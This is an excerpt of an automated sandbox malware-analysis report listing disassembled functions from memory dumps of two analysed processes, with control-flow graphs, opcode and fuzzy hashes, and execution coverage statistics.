                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction ID: b7b7eb7ee10760aa94a27eabb68364106a4525844e3e5f353e138b94af21ae32
                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                      • Instruction Fuzzy Hash: 2BB01204F6683F01A8083D7A08D20E470405B46120FC01170D60CC0085D88D10942242
                                      Function 00007FFD34663A81 Relevance: .0, Instructions: 8COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction ID: c29935bae90b7e96047902e2023dc21d80b537bc4536af27421fdb2bb27774a5
                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                      • Instruction Fuzzy Hash: 39C02B10F0C02480E725893044501FD31401F5A310F054171C04ED2081CF3C18003140

                                      Non-executed Functions

                                      Function 00007FFD346609B0 Relevance: 5.2, Strings: 4, Instructions: 194COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2352266566.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_7ffd34660000_BridgeInto.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: c9$!k9$"s9$#{9
                                      • API String ID: 0-1692736845
                                      • Opcode ID: 9f2e64bf36a39c19fe3cea799ef3ffe929734340d48cb4f446d7f1047f3c4917
                                      • Instruction ID: 836afbb4862616b3cbf403127ac25d4bef448b44617d2dc931181eb1fa10088c
                                      • Opcode Fuzzy Hash: 9f2e64bf36a39c19fe3cea799ef3ffe929734340d48cb4f446d7f1047f3c4917
                                      • Instruction Fuzzy Hash: 29518F0BB9CA6355E22136FDB0615FF6B88DFE537EB084677E18CD90838D0C648586E5

                                      Execution Graph

                                      Execution Coverage:4.9%
                                      Dynamic/Decrypted Code Coverage:66.7%
                                      Signature Coverage:0%
                                      Total number of Nodes:3
                                      Total number of Limit Nodes:0
                                      execution_graph 29107 7ffd346b8030 29108 7ffd346b8039 FindCloseChangeNotification 29107->29108 29110 7ffd346cef24 29108->29110

                                      Executed Functions

                                      Function 00007FFD34670D4C Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 461 7ffd34670d4c-7ffd34670eb9 call 7ffd346707f8 479 7ffd34670eed-7ffd34670f05 461->479 480 7ffd34670ebb-7ffd34670ee3 461->480 483 7ffd34670f1e 479->483 484 7ffd34670f07-7ffd34670f1d 479->484 480->479 486 7ffd34670f1f-7ffd34670f67 483->486 484->483 484->486 491 7ffd34670f6f-7ffd34671050 486->491
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 5Z_H
                                      • API String ID: 0-3267294416
                                      • Opcode ID: ca5812c185428d632471ebc4cf242259001675015f75cc9d3f57fb659b1ed200
                                      • Instruction ID: 5657be59aca262bd08c0b2ec277a90a0e2077f77993e76108729366cb20e4bd9
                                      • Opcode Fuzzy Hash: ca5812c185428d632471ebc4cf242259001675015f75cc9d3f57fb659b1ed200
                                      • Instruction Fuzzy Hash: D291D175A18B998FE796DB68C8653E97FE1FBA6304F4040AED04DD72E2CB7824108750
                                      Function 00007FFD34A6CC51 Relevance: .9, Instructions: 872COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 75c8fb35953cbc1405ae917b977a5b7813e7dee261054ae4e70b70691839761b
                                      • Instruction ID: e82c203539050ae859aaef7a2c41235dd0d2be8dd8ea067d26267ed5880181c4
                                      • Opcode Fuzzy Hash: 75c8fb35953cbc1405ae917b977a5b7813e7dee261054ae4e70b70691839761b
                                      • Instruction Fuzzy Hash: 54522930A0C64D8FDB99DB18C8A59B577E1FF96328F2401BDD14EC7192DA2CAC46CB81
                                      Function 00007FFD34670E43 Relevance: .2, Instructions: 172COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7f0eb06e24cb8ba0770f86d1e7a5a00863886e4e487559cd9ac667c54928a7c7
                                      • Instruction ID: 8a59a5adb6e0335b967daaddba980207d67dea9f211a2497c9155e0bf3187425
                                      • Opcode Fuzzy Hash: 7f0eb06e24cb8ba0770f86d1e7a5a00863886e4e487559cd9ac667c54928a7c7
                                      • Instruction Fuzzy Hash: 4C51CE75A18A598EE799DF9CC8A97A87FE1FBA6314F50017EE00DD3792CBB824108740
                                      Function 00007FFD34A69AF1 Relevance: 1.7, Strings: 1, Instructions: 408COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 352 7ffd34a69af1 353 7ffd34a69af6-7ffd34a69afe 352->353 354 7ffd34a69b04-7ffd34a69b16 call 7ffd34a694c0 353->354 355 7ffd34a69c81-7ffd34a69c95 353->355 360 7ffd34a69b18-7ffd34a69b1d 354->360 361 7ffd34a69ae5-7ffd34a69aec 354->361 357 7ffd34a69c9c-7ffd34a69ca7 355->357 358 7ffd34a69c97 355->358 358->357 363 7ffd34a69b3f-7ffd34a69b50 360->363 364 7ffd34a69b1f-7ffd34a69b23 360->364 362 7ffd34a69cc0-7ffd34a69cc5 361->362 362->352 367 7ffd34a69cca-7ffd34a69ced 363->367 368 7ffd34a69b56-7ffd34a69b6b 363->368 365 7ffd34a69c23-7ffd34a69c34 364->365 366 7ffd34a69b29-7ffd34a69b3a 364->366 370 7ffd34a69c3b-7ffd34a69c46 365->370 371 7ffd34a69c36 365->371 366->355 376 7ffd34a69cf1-7ffd34a69d53 367->376 377 7ffd34a69cef 367->377 368->367 369 7ffd34a69b71-7ffd34a69b7d 368->369 373 7ffd34a69b7f-7ffd34a69b96 call 7ffd34a67fd0 369->373 374 7ffd34a69bae-7ffd34a69bc4 call 7ffd34a694c0 369->374 371->370 373->365 387 7ffd34a69b9c-7ffd34a69bab call 7ffd34a68100 373->387 374->365 385 7ffd34a69bc6-7ffd34a69bd1 374->385 395 7ffd34a69d5e-7ffd34a69d69 376->395 396 7ffd34a69d1b-7ffd34a69d57 376->396 377->376 380 7ffd34a69d31-7ffd34a69d33 377->380 383 7ffd34a69d7e-7ffd34a69db0 380->383 384 7ffd34a69d35-7ffd34a69d50 380->384 403 7ffd34a69e98-7ffd34a69e9d 383->403 385->367 389 7ffd34a69bd7-7ffd34a69bec 385->389 387->374 389->367 392 7ffd34a69bf2-7ffd34a69c05 389->392 397 7ffd34a69c59-7ffd34a69c61 392->397 398 7ffd34a69c07-7ffd34a69c21 call 7ffd34a67fd0 392->398 396->395 414 7ffd34a69d23-7ffd34a69d30 396->414 404 7ffd34a69c69-7ffd34a69c6c 397->404 398->365 410 7ffd34a69c47-7ffd34a69c56 call 7ffd34a68100 398->410 418 7ffd34a69eb1-7ffd34a69ebc 403->418 419 7ffd34a69dcc-7ffd34a69ea7 403->419 409 7ffd34a69c73-7ffd34a69c7b 404->409 409->355 415 7ffd34a69aba-7ffd34a69ac7 409->415 410->397 414->380 415->409 417 7ffd34a69acd-7ffd34a69ae1 415->417 417->409 422 7ffd34a69e44-7ffd34a69e4c 418->422 423 7ffd34a69ebe-7ffd34a69ecf 418->423 431 7ffd34a69e7d-7ffd34a69e95 419->431 432 7ffd34a69df6-7ffd34a69df9 419->432 426 7ffd34a69ed1-7ffd34a69f21 call 7ffd34a66710 422->426 427 7ffd34a69e4d-7ffd34a69e5d 422->427 423->418 427->426 430 7ffd34a69e5f-7ffd34a69e69 427->430 435 7ffd34a69e6b-7ffd34a69e72 430->435 431->403 432->431 437 7ffd34a69dff-7ffd34a69e02 432->437 439 7ffd34a69e74-7ffd34a69e7c 435->439 440 7ffd34a69e32-7ffd34a69e42 435->440 437->435 441 7ffd34a69e04-7ffd34a69e31 437->441 440->422
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: xom4
                                      • API String ID: 0-1034107437
                                      • Opcode ID: d516dd488c9554b5d23093aacf59badde25eced33e37e9ca781861c7b2ce30f9
                                      • Instruction ID: 00043e74b27e145bab14cfdd8fae20257be1af581fb39d81beb636b7fdca0c91
                                      • Opcode Fuzzy Hash: d516dd488c9554b5d23093aacf59badde25eced33e37e9ca781861c7b2ce30f9
                                      • Instruction Fuzzy Hash: 31E13470A0CB468FE369CB28C4E0575B7E5FF46328B24457EC58EC7692DA2DB842DB41
                                      Function 00007FFD346B8030 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 448 7ffd346b8030-7ffd346b8044 450 7ffd346b8046-7ffd346b806c 448->450 451 7ffd346b807a-7ffd346cef22 FindCloseChangeNotification 448->451 450->451 458 7ffd346cef2a-7ffd346cef58 451->458 459 7ffd346cef24 451->459 459->458
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD346A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346A1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd346a1000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c323bad5c026c9793c341251e29085465e9fe6c70fdbff5a138626bbfaaa4f31
                                      • Instruction ID: aadbb59dfa5e5682f3e3f2bb37ea2f0687e086f593bc8d4d174222150cf813b2
                                      • Opcode Fuzzy Hash: c323bad5c026c9793c341251e29085465e9fe6c70fdbff5a138626bbfaaa4f31
                                      • Instruction Fuzzy Hash: 84312871A0CA588FEB58DF99C8457F97BF0EB66310F04416FD04DD3292DA64A805C790
                                      Function 00007FFD34A637E8 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 574 7ffd34a637e8-7ffd34a63800 576 7ffd34a63808-7ffd34a63833 574->576 580 7ffd34a6385c-7ffd34a63862 576->580 581 7ffd34a63869-7ffd34a6386f 580->581 582 7ffd34a63871-7ffd34a63876 581->582 583 7ffd34a63835-7ffd34a6384e 581->583 586 7ffd34a63763-7ffd34a637a8 582->586 587 7ffd34a6387c-7ffd34a638b1 582->587 584 7ffd34a63854-7ffd34a63859 583->584 585 7ffd34a63945-7ffd34a63955 583->585 584->580 592 7ffd34a63958-7ffd34a639a6 585->592 593 7ffd34a63957 585->593 586->581 591 7ffd34a637ae-7ffd34a637b4 586->591 594 7ffd34a637b6 591->594 595 7ffd34a63765-7ffd34a6393d 591->595 593->592 599 7ffd34a637df-7ffd34a637e6 594->599 595->585 599->574 601 7ffd34a637b8-7ffd34a637d1 599->601 601->585 603 7ffd34a637d7-7ffd34a637dc 601->603 603->599
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 22534ddda6b97601dc6ab9fcebe6e1b418ad7f64b0e89578816b5af661cfa725
                                      • Instruction ID: 78f8284d668e7ce21549b26d397fb2637f9b7fe879eae88942579f27b4f169f5
                                      • Opcode Fuzzy Hash: 22534ddda6b97601dc6ab9fcebe6e1b418ad7f64b0e89578816b5af661cfa725
                                      • Instruction Fuzzy Hash: DE515A71E0960E9FDB59DF98C4A55FDB7B1EF4A314F2041BAD11AE7282CA3C6802CB40
                                      Function 00007FFD34A6EA68 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 606 7ffd34a6ea68-7ffd34a6ea80 608 7ffd34a6ea88-7ffd34a6eab3 606->608 612 7ffd34a6eadc-7ffd34a6eae2 608->612 613 7ffd34a6eae9-7ffd34a6eaef 612->613 614 7ffd34a6eaf1-7ffd34a6eaf6 613->614 615 7ffd34a6eab5-7ffd34a6eace 613->615 618 7ffd34a6e9e3-7ffd34a6ea28 614->618 619 7ffd34a6eafc-7ffd34a6eb37 614->619 616 7ffd34a6ead4-7ffd34a6ead9 615->616 617 7ffd34a6ebc5-7ffd34a6ebd5 615->617 616->612 625 7ffd34a6ebd7 617->625 626 7ffd34a6ebd8-7ffd34a6ec26 617->626 618->613 623 7ffd34a6ea2e-7ffd34a6ea34 618->623 627 7ffd34a6e9e5-7ffd34a6ebbd 623->627 628 7ffd34a6ea36 623->628 625->626 627->617 631 7ffd34a6ea5f-7ffd34a6ea66 628->631 631->606 632 7ffd34a6ea38-7ffd34a6ea51 631->632 632->617 636 7ffd34a6ea57-7ffd34a6ea5c 632->636 636->631
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 731187ca6b9c171ce2c2eded4e195813f0a405fef093fb68a54347cc63b31516
                                      • Instruction ID: 6af5a592dba053cf9b12918fee11b52fbdc1b37c48a792f1192118a56430ef11
                                      • Opcode Fuzzy Hash: 731187ca6b9c171ce2c2eded4e195813f0a405fef093fb68a54347cc63b31516
                                      • Instruction Fuzzy Hash: 1A515B71E0864E8FDB59DB98C4A55BEBBB1FF56315F6040BED11AE7282CA3C6801CB40
                                      Function 00007FFD34A68848 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 639 7ffd34a68848-7ffd34a68850 640 7ffd34a68858-7ffd34a68883 639->640 644 7ffd34a688ac-7ffd34a688b2 640->644 645 7ffd34a688b9-7ffd34a688bf 644->645 646 7ffd34a688c1-7ffd34a688c6 645->646 647 7ffd34a68885-7ffd34a6889e 645->647 648 7ffd34a687b3-7ffd34a687f8 646->648 649 7ffd34a688cc-7ffd34a68907 646->649 650 7ffd34a688a4-7ffd34a688a9 647->650 651 7ffd34a68995-7ffd34a689a5 647->651 648->645 654 7ffd34a687fe-7ffd34a68804 648->654 661 7ffd34a68988-7ffd34a6898d 649->661 650->644 659 7ffd34a689a7 651->659 660 7ffd34a689a8-7ffd34a689b7 651->660 657 7ffd34a687b5 654->657 658 7ffd34a68806 654->658 657->661 662 7ffd34a6882f-7ffd34a68836 658->662 659->660 661->651 663 7ffd34a68808-7ffd34a68821 662->663 664 7ffd34a68838-7ffd34a68843 662->664 663->651 668 7ffd34a68827-7ffd34a6882c 663->668 664->639 668->662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: fa27b9745312f47ffb647bef4eb38672b330891c8aaa63f81203eaa89519b618
                                      • Instruction ID: 7b0bb45b406977b4b34bdde2b5075b30e88d6b5f4e019be6ec7fe9f70994a348
                                      • Opcode Fuzzy Hash: fa27b9745312f47ffb647bef4eb38672b330891c8aaa63f81203eaa89519b618
                                      • Instruction Fuzzy Hash: 38413670E0960A8FDB49DF94C4A05BDBBB1FF56314F20407EC10AE7282CA3C6941DB10
                                      Function 00007FFD34A6224B Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 669 7ffd34a6224b-7ffd34a62275 672 7ffd34a6227b-7ffd34a622e7 669->672 673 7ffd34a623a7-7ffd34a623d4 669->673 682 7ffd34a622ef-7ffd34a622fa 672->682 682->672 683 7ffd34a62300 682->683 683->673
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 8|4
                                      • API String ID: 0-3653666221
                                      • Opcode ID: 9c3efaa4a39ecaca285e425d4a7524b86659807e07ae50d3c4aff3e276ef2b4b
                                      • Instruction ID: 0eb192f7be1326e1b286f035f9ef7b2aa20ab27d307a164879ca2fd99d99ab3b
                                      • Opcode Fuzzy Hash: 9c3efaa4a39ecaca285e425d4a7524b86659807e07ae50d3c4aff3e276ef2b4b
                                      • Instruction Fuzzy Hash: AF316F72B0891A8FDB44EF6CD4A19E9B7A1FF56320B144179D15ED7686CB2CBC12C780
                                      Function 00007FFD34671280 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34670000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: H
                                      • API String ID: 0-2852464175
                                      • Opcode ID: 40fb471129eae5799df26a95b1965574a02469201aef58e6da1a351e175e8cab
                                      • Instruction ID: 4913850e68b737d73eeaee10dad72ecd329930101a4839b561557797e63d8e56
                                      • Opcode Fuzzy Hash: 40fb471129eae5799df26a95b1965574a02469201aef58e6da1a351e175e8cab
                                      • Instruction Fuzzy Hash: B0114062F0D98E4AFB98AE6C5CA93F97AC1EF66244F00017FE44ED21D3CC1E58044345
                                      Function 00007FFD34683F39 Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3416172132.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34680000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: M
                                      • API String ID: 0-3664761504
                                      • Opcode ID: 1fa990c9830a99d2384196ca51ad4b9b3976fbe327ffde6dbc8e156ae8d2106b
                                      • Instruction ID: 063c014819ea95cc600ccd5d8b7be44e1b5bb7ad23e357dc7549202cf29b068a
                                      • Opcode Fuzzy Hash: 1fa990c9830a99d2384196ca51ad4b9b3976fbe327ffde6dbc8e156ae8d2106b
                                      • Instruction Fuzzy Hash: C011B661A0D7C54FDB56AB3488A84A87FB0EF97201B4901EFD14DCB1A3D92D5885C741
                                      Function 00007FFD34A6BB31 Relevance: .5, Instructions: 522COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 190119bf4ae022daf86cd2671f12954a2c76cf154761b44aa75baf7fa2c3b239
                                      • Instruction ID: 5d7f66f71ea737a8e1904b2ec09e074be38b0410b09674b76b2aee7310c90e69
                                      • Opcode Fuzzy Hash: 190119bf4ae022daf86cd2671f12954a2c76cf154761b44aa75baf7fa2c3b239
                                      • Instruction Fuzzy Hash: 29F109357088198FDB88FB6CC0A5F7573D2EBA8705B1140A8E10EC72B6DD24ED95CB85
                                      Function 00007FFD34A68ACA Relevance: .5, Instructions: 465COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c7dfa2e846d29ff95e6249f9c555c73f3696aeda406812cc6b98aa116f969dd5
                                      • Instruction ID: 9af5023dc0e1c33c9b37978446083a8c484f8ea1ed339b05403797429e998219
                                      • Opcode Fuzzy Hash: c7dfa2e846d29ff95e6249f9c555c73f3696aeda406812cc6b98aa116f969dd5
                                      • Instruction Fuzzy Hash: 3A02D170A196458FEB59CF18C4E06B437A5FF56314F6445BDC94ACB68ACB3CE881CB81
                                      Function 00007FFD34A607E9 Relevance: .5, Instructions: 458COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d125960c38043549d20c8f69e897c681bac0c4ef4cb4f6205ecdc84b709af43a
                                      • Instruction ID: df908d9b068a52c29992b67cc42149b20693bbbc7f59b94b3134d355e2bcf933
                                      • Opcode Fuzzy Hash: d125960c38043549d20c8f69e897c681bac0c4ef4cb4f6205ecdc84b709af43a
                                      • Instruction Fuzzy Hash: 9A812A22B4DA968FE322976898A00F97794EF47338F28457AD689C60C3DF1C7485B791
                                      Function 00007FFD34A6ECFA Relevance: .4, Instructions: 441COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07f33bfe127ad755aea9b75b3a4595da495ff8eccc99371fc1d06d03f27bf2e7
                                      • Instruction ID: 96a4cf30f233c1d1aff9f709f664d82e0014aabfe4ef51554f1aa16d677f384f
                                      • Opcode Fuzzy Hash: 07f33bfe127ad755aea9b75b3a4595da495ff8eccc99371fc1d06d03f27bf2e7
                                      • Instruction Fuzzy Hash: 9AF1D4306196568FEB5DCF18C4E06B537A1FF46324B6441BDD94ACB68BDA3CE882CB41
                                      Function 00007FFD34A64AA1 Relevance: .4, Instructions: 416COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f39e84b894c0ec741093aff5b27285a6541427756f1c8e92c1fe993cb65769ad
                                      • Instruction ID: 69f7b573dc7a400cca7f0e0aa38e72241ad57c011a17cd22a58ece523d4e5653
                                      • Opcode Fuzzy Hash: f39e84b894c0ec741093aff5b27285a6541427756f1c8e92c1fe993cb65769ad
                                      • Instruction Fuzzy Hash: 14D1E130A0DB468FE369DB28D4E05B577E1FF46328B20467EC58EC7682DE2DB8429745
                                      Function 00007FFD34A60C63 Relevance: .3, Instructions: 332COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9a691ea21af203ed5f07f2e65f32e0d921399548ab84aa796f8e13d069aaf8f4
                                      • Instruction ID: ce2afed0bd9ed0820c518d134446f7c5134f8c4703d1db964dd06a13770639a2
                                      • Opcode Fuzzy Hash: 9a691ea21af203ed5f07f2e65f32e0d921399548ab84aa796f8e13d069aaf8f4
                                      • Instruction Fuzzy Hash: 3A313612F4D6A78AF335A6ACA4B10F967849F4233DF28463AD68CD51C3DE4C28C17692
                                      Function 00007FFD34A63312 Relevance: .3, Instructions: 329COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 151f471d96939eff83035491e5f465b093a791b924ede2b3447ee6a0b133a009
                                      • Instruction ID: 0f3717a9fce4b5e3c144e70cdf84a7b48ad05ef94ae5ca82e9d7aaf787c500ff
                                      • Opcode Fuzzy Hash: 151f471d96939eff83035491e5f465b093a791b924ede2b3447ee6a0b133a009
                                      • Instruction Fuzzy Hash: 8BC1C070B0CA468FE749DB68C0A16A5B7A1FF5A314F6441BDC14EC7B86CB2CB852C780
                                      Function 00007FFD34A6E592 Relevance: .3, Instructions: 327COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bd02d4aa681c2b49cbcc7d0969b5e719c28736076b0002ec28742f209e251a8b
                                      • Instruction ID: d812071e2e2c78b83c5f2153449c9717999bfdf442650adf4f46f204d2b1f5f7
                                      • Opcode Fuzzy Hash: bd02d4aa681c2b49cbcc7d0969b5e719c28736076b0002ec28742f209e251a8b
                                      • Instruction Fuzzy Hash: 9FC1D470B0CA868FE749DB68C0A06A5B7E1FF5A314F644179D54EC7AC6DB2CB851CB80
                                      Function 00007FFD34A68362 Relevance: .3, Instructions: 323COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000019.00000002.3423401693.00007FFD34A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_25_2_7ffd34a60000_EoNanmDGxPEtougVgAjHLx.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7d6ba2f0fcfe452a0ebca6bfe21542fba9abe5a2da9d1e9386f52b9553ae76e8
